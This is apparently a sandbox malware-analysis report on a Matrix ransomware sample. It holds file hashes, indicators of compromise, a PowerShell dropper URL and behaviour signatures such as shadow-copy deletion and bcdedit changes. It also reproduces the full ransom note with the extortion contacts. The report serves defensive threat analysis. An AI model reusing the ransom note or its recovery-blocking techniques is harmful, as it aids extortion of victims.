matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
150s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-04-2024 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Size

1.2MB
MD5

907636b28d162f7110b067a8178fa38c
SHA1

048ae4691fe267e7c8d9eda5361663593747142a
SHA256

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b
SHA512

501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a
SSDEEP

24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Score

10^/10

matrix discovery evasion persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#CORE_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 6275EEFC17B9E637\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 6275EEFC17B9E637\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 POGuen8i\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\Admin\Downloads\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MEIPreload\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Cultures\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ja-jp\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Java\jre-1.8\lib\ext\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f33\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

9404 bcdedit.exe
1608 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

147 2748 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

0AePg1f964.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS 0AePg1f964.exe

pid	process
9404	bcdedit.exe
1608	bcdedit.exe

flow	pid	process
147	2748	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	0AePg1f964.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

0AePg1f964.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	0AePg1f964.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation wscript.exe
Executes dropped EXE 3 IoCs

Processes:

NWpi5HfZ.exe0AePg1f9.exe0AePg1f964.exe

pid process

2232 NWpi5HfZ.exe
3416 0AePg1f9.exe
5816 0AePg1f964.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

1432 takeown.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
2232	NWpi5HfZ.exe
3416	0AePg1f9.exe
5816	0AePg1f964.exe

pid	process
1432	takeown.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0AePg1f9.exe	upx
behavioral8/memory/3416-13387-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral8/memory/3416-14387-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0AePg1f964.exe6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

description	ioc	process
File opened (read-only)	\??\Q:	0AePg1f964.exe
File opened (read-only)	\??\T:	0AePg1f964.exe
File opened (read-only)	\??\Z:	0AePg1f964.exe
File opened (read-only)	\??\W:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\T:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\R:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
